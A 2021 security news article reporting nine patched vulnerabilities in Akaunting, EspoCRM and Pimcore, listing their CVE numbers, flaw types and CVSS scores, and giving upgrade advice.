Softpedia >News >Security
Softpedia Homepage   

Several Security Flaws Found in 3 Open-Source Software

If flawed open source software solutions are properly exploited, the entire server can be compromised

Jul 28, 2021 16:09 GMT  ·  By
Several Security Vulnerabilities Found in 3 Open-Source Software
   Several Security Vulnerabilities Found in 3 Open-Source Software

Cybersecurity experts discovered nine security flaws in three open-source projects: Akaunting, EspoCRM, and Pimcore, according to The Hacker News. All of them are typically used by a wide range of small and medium-sized businesses.

All the security issues at stake that affect EspoCRm v6.1.6, the Pimcore Customer Data Framework v3.0.0, the Pimcore AdminBundle v6.8.0, and the Akaunting v2.1.12 were resolved within a responsible release day, according to cybersecurity researcher Trevor Christiansen of Rapid7, and Wiktor Sędkowski of Nokia. In the Akaunting project, six of the nine defects were found.

It is possible that an authenticated attacker could use these flaws to execute JavaScript code arbitrarily, control the underlying operating system and use it as a launch point for further malicious attacks, change the company linked with a user account without their knowledge, and even trigger a denial of service (DoS) sending a special HTTP request.

The following open-source software solutions have been identified to contain the vulnerabilities listed below: 

Pimcore - an enterprise software platform for managing customer data, digital assets, content, and digital commerce. 

  • CVE-2021-31867 - SQL injection in Pimcore Customer Data Framework v3.0.0, with a CVSS score of 6.5 
  • CVE-2021-31869 - Pimcore AdminBundle v6.8.0, with a CVSS score of 6.5 
EspoCRM - a customer relationship management (CRM) solution

  • CVE-2021-3539 - Persistent XSS flaw in EspoCRM v6.1.6, with a CVSS score of 6.3 

Akaunting - an open-source and online accounting program for tracking invoices and expenses.

  • CVE-2021-36805 - Invoice footer persistent XSS in Akaunting v2.1.12, with a CVSS score of 5.2 
  • CVE-2021-36804 - Weak Password Reset in Akaunting v2.1.12, with a CVSS score of 5.4 
  • CVE-2021-36803 - Persistent XSS during avatar upload in Akaunting v2.1.12, with a CVSS score of 6.3 
  • CVE-2021-36802 - Denial-of-service via user-controlled 'locale' variable in Akaunting v2.1.12, with a CVSS score of 6.5 
  • CVE-2021-36800 - OS command injection in Akaunting v2.1.12, with a CVSS score of 8.7 
  • CVE-2021-36801 - Authentication bypass in Akaunting v2.1.12, with a CVSS score of 8.5 

Akaunting has also been patched for a weak password reset vulnerability where an attacker could exploit the "I forgot my password" feature to send a phishing email with a malicious link that, when opened, would return a password reset token, among other things. After that, the malicious player might use the token to change their password.

Thousands of small and medium-sized businesses use all three software solutions, and some of them benefit from the support provided by the software vendors. The researchers concluded that all these problems caused by the security holes can be solved by upgrading the corresponding software. Another measure to defend against the current and next threats is to solely allow these software solutions to run local network and block their access to the Internet.